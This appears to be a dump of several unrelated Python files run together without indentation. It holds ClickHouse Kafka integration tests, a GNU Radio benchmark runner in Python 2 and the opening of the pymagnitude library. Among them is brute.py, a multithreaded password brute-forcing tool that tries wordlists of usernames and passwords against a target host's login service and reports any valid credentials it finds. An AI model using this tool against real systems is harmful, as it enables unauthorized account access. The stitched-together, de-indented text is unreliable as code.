instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5,5,'k5',1577836805))
while int(instance.query("SELECT count() FROM test.view")) < 5:
time.sleep(1)
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# print(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(600)
def test_kafka_flush_by_time(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() > 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
@pytest.mark.timeout(90)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query("SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happens during test, we need to check only result of first flush (part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# print(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
@pytest.mark.timeout(600)
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3,10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce('topic_with_multiple_partitions2', messages)
time.sleep(30)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count) )
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
@pytest.mark.timeout(1200)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONSURRENT_CONSUMERS=11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
#time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce('topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
print("Setting up {}".format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
while int(instance.query("SELECT count() FROM test.destination WHERE _consumed_by='{}'".format(table_name))) == 0:
print("Waiting for test.kafka_consumer{} to start consume".format(consumer_index))
time.sleep(1)
cancel.set()
# I leave last one working by intent (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS-1):
print("Dropping test.kafka_consumer{}".format(consumer_index))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{}'.format(consumer_index))
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='kafka_consumer{}'".format(consumer_index))) == 1:
time.sleep(1)
# print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
print("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed,msg_index[0]))
print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
print("kafka_consumer{}".format(consumer_index))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(1200)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(1);
''')
# the tricky part here is that disconnect should happen after write prefix, but before write suffix
# so i use sleepEachRow
with PartitionManager() as pm:
time.sleep(12)
pm.drop_instance_zk_connections(instance)
time.sleep(20)
pm.heal_all
# connection restored and it will take a while until next block will be flushed
# it takes years on CI :\
time.sleep(90)
# as it's a bit tricky to hit the proper moment - let's check in logs if we did it correctly
assert instance.contains_in_log("ZooKeeper session has been expired.: while write prefix to view")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
@pytest.mark.timeout(120)
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
#kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
@pytest.mark.timeout(120)
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': j+1}) for j in range(1)]
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
while int(instance.query("SELECT count() FROM test.destination")) == 0:
print("Waiting for test.kafka_consumer to start consume")
time.sleep(1)
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
time.sleep(1)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(12)
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000;
''')
cancel.set()
time.sleep(15)
#kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
print(result)
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0]-1)), 'Missing data!'
@pytest.mark.timeout(120)
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': j+1}) for j in range(20000)]
kafka_produce('test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
while int(instance.query("SELECT count() FROM test.destination")) < 20000:
print("Waiting for consume")
time.sleep(1)
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
@pytest.mark.timeout(1200)
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.5);
''')
#print time.strftime("%m/%d/%Y %H:%M:%S")
time.sleep(12) # 5-6 sec to connect to kafka, do subscription, and fetch 20 rows, another 10 sec for MV, after that commit should happen
#print time.strftime("%m/%d/%Y %H:%M:%S")
kafka_cluster.pause_container('kafka1')
# that timeout it VERY important, and picked after lot of experiments
# when too low (<30sec) librdkafka will not report any timeout (alternative is to decrease the default session timeouts for librdkafka)
# when too high (>50sec) broker will decide to remove us from the consumer group, and will start answering "Broker: Unknown member"
time.sleep(40)
#print time.strftime("%m/%d/%Y %H:%M:%S")
kafka_cluster.unpause_container('kafka1')
#kafka_cluster.open_bash_shell('instance')
# connection restored and it will take a while until next block will be flushed
# it takes years on CI :\
time.sleep(30)
# as it's a bit tricky to hit the proper moment - let's check in logs if we did it correctly
assert instance.contains_in_log("Local: Waiting for coordinator")
assert instance.contains_in_log("All commit attempts failed")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# timeout triggers rebalance, making further commits to the topic after getting back online
# impossible. So we have a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we came to partition end we will repeat polling until reaching kafka_max_block_size or flush_interval
# that behavior is a bit quesionable - we can just take a bigger pauses between polls instead -
# to do more job in a single pass, and give more rest for a thread.
# But in cases of some peaky loads in kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# also we can came to eof because we drained librdkafka internal queue too fast
@pytest.mark.timeout(120)
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
messages = [json.dumps({'key': j+1, 'value': j+1}) for j in range(1)]
kafka_produce('premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments done during select, so it start sending data to test.destination
# immediately after creation of MV
time.sleep(2)
# produce more messages after delay
kafka_produce('premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
time.sleep(6)
# it should be single part, i.e. single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
@pytest.mark.timeout(180)
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': j+1}) for j in range(20000)]
kafka_produce('test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.query("SELECT * FROM test.kafka")
instance.query("SELECT count() FROM test.destination")
# enough to trigger issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination")) < 20000:
print("Waiting for consume")
time.sleep(1)
@pytest.mark.timeout(180)
def test_kafka_issue14202(kafka_cluster):
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
time.sleep(3)
instance.query('INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
if __name__ == '__main__':
cluster.start()
raw_input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
brute.py
|
from typing import ValuesView
import Cerbrutus.services as services
import time
import sys
import threading
from colorama import Fore, Style
import Cerbrutus
'''
Add estimated time remaining...
Add output of how long its been running for already every few minutes.
'''
class BruteUtil:
threads = []
start = time.time()
end = time.time()
MAX_THREADS = 1000
def __init__(self, ip: str, port: int, service: str, users: list, passwords: list, threads: int = 10):
# Validate IP
if not isinstance(ip, str) or '.' not in ip:
raise ValueError("The Specified host to connect to does not seem to be a valid host.")
self.ip = ip
# Validate Port
try:
port = int(port)
except Exception:
raise ValueError("[-] - The Specified port to connect to does not seem to be a valid port between 1 and 65535.")
if not isinstance(port, int) or 65535 < port or port < 0:
raise ValueError("[-] - The Specified port to connect to does not seem to be a valid port between 1 and 65535.")
self.port = port
# Validate Service
if not isinstance(service, str) or service.upper() not in services.valid_services:
raise ValueError("[-] - The Specified service to connect to is not yet in the list of services. Please make a feature request, or write it and make a pull :P.")
service_info = services.valid_services[service.upper()]
self.service = service_info["class"]
reccomended_threads = service_info["reccomendedThreads"]
self.threads_num = threads
if threads > reccomended_threads:
print(f"[!] - Maximum reccomended threads for service {service.upper()} is {reccomended_threads}...\n[!] - Be aware you may need to minimise the number of threads you use for better efficiency")
if threads > self.MAX_THREADS:
self.threads_num = self.MAX_THREADS
print(f"[*] - MAX NUMBER OF THREADS IS {self.MAX_THREADS}")
print(f"[+] - Running with {self.threads_num} threads...")
# Validate Users list
if not isinstance(users, list) or not users:
raise ValueError("[-] - The users to to attempt was not a list with items in.")
self.users = users
# Validate Passwords list
if not isinstance(passwords, list) or not users:
raise ValueError("[-] - The users to to attempt was not a list with items in.")
self.passwords = passwords
def test_connection(self):
if self.service.connect(self.ip, self.port, "test", "adidfhudgaduydfguiadhg fuioa ngkfcgsiufhkjnfkasdhgfuyadgbuf") is None:
print(f"[-] - COULD NOT CONNECT TO {self.ip}:{self.port}... EXITTING!")
self._exit()
def brute(self):
self.start = time.time()
self.creds_found = False
self.test_connection()
for user in self.users:
print(f"[*] - Starting attack against {user}@{self.ip}:{self.port}")
for pwd in self.passwords:
if self.creds_found:
self._exit()
self.passwords[self.passwords.index(pwd)] = pwd = Cerbrutus.Wordlist.clean_word(pwd)
thread = threading.Thread(target=self._auth, args=(user, pwd))
self.threads.append(thread)
while threading.active_count() > self.threads_num + 1:
continue
sys.stdout.write(f"\r[*] - Trying: {self.passwords.index(pwd) + 1}/{len(self.passwords)}")
thread.start()
self._exit()
def _auth(self, user, pwd):
if self.creds_found:
return
# sys.stdout.write(f"\r{user}:{pwd} ")
auth_result = self.service.connect(self.ip, self.port, user, pwd)
if auth_result:
self.creds_found = True
time.sleep(2)
print()
print(f"{Fore.GREEN}\033[1m[+] - VALID CREDENTIALS FOUND:\n\t{user}:{pwd}{Style.RESET_ALL}")
print(f"[*] - Took {(self.passwords.index(pwd)+1)*(self.users.index(user)+1)} tries")
self.end = time.time()
print(f"[*] Total time - {self.end - self.start} seconds.")
def _thread_collection(self):
for thread in self.threads:
try:
thread.join()
except RuntimeError:
pass
def _exit(self):
if not self.creds_found:
print("\n[*] - Approaching final keyspace...")
self._thread_collection()
if not self.creds_found:
print(f"{Fore.RED}\033[1m[-] - Failed to find valid credentials for {self.ip}:{self.port}{Style.RESET_ALL}")
self.end = time.time()
print(f"[*] Total time - {self.end - self.start} seconds.")
sys.exit()
|
run_benchmarks.py
|
import sys
import os
import time
import subprocess
import copy
import numpy
from matplotlib.backends.backend_pdf import PdfPages
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
from matplotlib.font_manager import FontProperties
import multiprocessing
cpu_count = multiprocessing.cpu_count()
from bm_registry import BENCHMARKS
NUM_RUNS_PER_TEST = 3
BAD_BOOST_KILL_DURATION = 5.0 #seconds
__path__ = os.path.dirname(__file__)
import threading
#because boost interrupts are broken in half the versions of boost
#this stupidity makes stock gnuradio apps exit with bad boost
def kill_after_timeout(p):
time.sleep(BAD_BOOST_KILL_DURATION)
try: p.kill()
except: pass
def run_a_single_one(args, env):
print env
p = subprocess.Popen(args=args, env=env, stdout=subprocess.PIPE)
t = threading.Thread(target=kill_after_timeout, args = (p,))
t.daemon = True
t.start()
p.wait()
out = p.stdout.read()
#print out
for line in out.splitlines():
if line.startswith('##RESULT##'):
return float(line[len('##RESULT##'):].strip())
raise Exception, 'no result found!'
#return t1-t0
def expand_tests(bm):
for run in bm['tests']:
if run.has_key('expand') and run['expand']:
import copy
new_run = copy.deepcopy(run)
new_run['wat'] += '\n(Block)'
new_run['env']['GRAS_YIELD'] = 'BLOCKING'
yield new_run
new_run = copy.deepcopy(run)
new_run['wat'] += '\n(Spin)'
new_run['env']['GRAS_YIELD'] = 'STRONG'
yield new_run
new_run = copy.deepcopy(run)
new_run['wat'] += '\n(TPB)'
new_run['env']['GRAS_YIELD'] = 'BLOCKING'
new_run['env']['GRAS_TPP'] = '1'
yield new_run
else: yield run
def do_a_benchmark(bm):
title = bm['wat']
print '#'*(len(title)+25)
print '## running benchmark:', title
print '#'*(len(title)+25)
result_means = list()
result_stddevs = list()
test_names = list()
for run in expand_tests(bm):
test_name = run['wat']
print '-'*(len(test_name)+25)
print '-- running test:', test_name.replace('\n', ' ')
print '-'*(len(test_name)+25)
test_names.append(test_name)
args = run['args']
args[0] = os.path.join(__path__, args[0])
args = [sys.executable] + args
env = run['env']
env = copy.copy(env)
if run.has_key('envextra'):
env.update(run['envextra'])
run_results = list()
for num_runs in range(NUM_RUNS_PER_TEST):
res = run_a_single_one(args=args, env=env)
print 'Result:', res
run_results.append(res)
result_means.append(numpy.average(run_results))
result_stddevs.append(numpy.std(run_results))
print 'result_means', result_means
print 'result_stddevs', result_stddevs
bogomips = numpy.array(result_means)/1e6
bogomips_dev = numpy.array(result_stddevs)/1e6
ind = numpy.arange(len(test_names))
width = 0.35
fig = Figure()
fig.set_size_inches((11,8.5))
FigureCanvas(fig)
ax = fig.add_subplot(1, 1, 1,
ylabel='Performance (BogoMips)', title=title,
xlabel='', xticks=ind+width/2., xticklabels=test_names
)
rects = ax.bar(ind, bogomips, width, color='blue',
yerr=bogomips_dev,
error_kw=dict(elinewidth=6, ecolor='pink'),
label=bm['moar']
)
ax.set_xlim(-width, max(len(ind), 4))
ax.set_ylim(0, max(*bogomips)*1.1 + max(*bogomips_dev)*2)
for rect in rects:
height = rect.get_height()
ax.text(rect.get_x()+rect.get_width()/2.0, 1.01*height, '%.3f'%height, horizontalalignment='center')
ax.grid(True)
fontP = FontProperties()
fontP.set_size('small')
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels, prop=fontP, loc="upper right")
print '\n'
return fig
if __name__ == '__main__':
####################################################################
## create pdf generator
####################################################################
pdf_pages = PdfPages(sys.argv[1])
####################################################################
## loop through tests
####################################################################
for bm in BENCHMARKS:
fig = do_a_benchmark(bm)
pdf_pages.savefig(fig)
####################################################################
## done
####################################################################
print 'make pdf...'
pdf_pages.close()
print 'done!'
|
__init__.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import bisect
import difflib
import gc
import http.client
import hashlib
import heapq
import lz4.frame
import math
import mmap
import operator
import os
import re
import sys
import tempfile
import threading
import time
import xxhash
import numpy as np
import uuid
from annoy import AnnoyIndex
from copy import deepcopy
from fasteners import InterProcessLock
from itertools import cycle, islice, chain, product, tee
from numbers import Number
from time import sleep
from pymagnitude.converter_shared import DEFAULT_NGRAM_END
from pymagnitude.converter_shared import BOW, EOW
from pymagnitude.converter_shared import CONVERTER_VERSION
from pymagnitude.converter_shared import fast_md5_file
from pymagnitude.converter_shared import char_ngrams
from pymagnitude.converter_shared import norm_matrix
from pymagnitude.converter_shared import unroll_elmo
from pymagnitude.converter_shared import KeyList
from pymagnitude.third_party.repoze.lru import lru_cache
try:
from itertools import imap
except ImportError:
imap = map
try:
from itertools import izip
except ImportError:
izip = zip
try:
unicode
except NameError:
unicode = str
try:
from http.client import CannotSendRequest, ResponseNotReady
except BaseException:
from httplib import CannotSendRequest, ResponseNotReady
try:
from urllib.request import urlretrieve
except BaseException:
from urllib import urlretrieve
try:
from urllib.parse import urlparse
except BaseException:
from urlparse import urlparse
try:
xrange
except NameError:
xrange = range
# Import AllenNLP
sys.path.append(os.path.dirname(__file__) + '/third_party/')
sys.path.append(os.path.dirname(__file__) + '/third_party_mock/')
from pymagnitude.third_party.allennlp.commands.elmo import ElmoEmbedder
# Import SQLite
try:
sys.path.append(os.path.dirname(__file__) + '/third_party/')
sys.path.append(os.path.dirname(__file__) + '/third_party/internal/')
from pymagnitude.third_party.internal.pysqlite2 import dbapi2 as sqlite3
db = sqlite3.connect(':memory:')
db.close()
_SQLITE_LIB = 'internal'
except Exception:
import sqlite3
_SQLITE_LIB = 'system'
# Import SQLite (APSW)
try:
import pymagnitude.third_party.internal.apsw as apsw
db = apsw.Connection(':memory:')
db.close()
_APSW_LIB = 'internal'
except Exception:
_APSW_LIB = 'none'
DEFAULT_LRU_CACHE_SIZE = 1000
def _sqlite_try_max_variable_number(num):
""" Tests whether SQLite can handle num variables """
db = sqlite3.connect(':memory:')
try:
db.cursor().execute(
"SELECT 1 IN (" + ",".join(["?"] * num) + ")",
([0] * num)
).fetchall()
return num
except BaseException:
return -1
finally:
db.close()
# Log function
def _log(*args):
args = list(args)
args[0] = "[Magnitude] " + args[0]
if not _log.disable_message:
print("[Magnitude] Magnitude is logging messages for slow "
"operations to standard error. To turn this"
" off pass log=False to the Magnitude "
"constructor.", file=sys.stderr)
_log.disable_message = True
print(*args, file=sys.stderr)
_log.disable_message = False
class Magnitude(object):
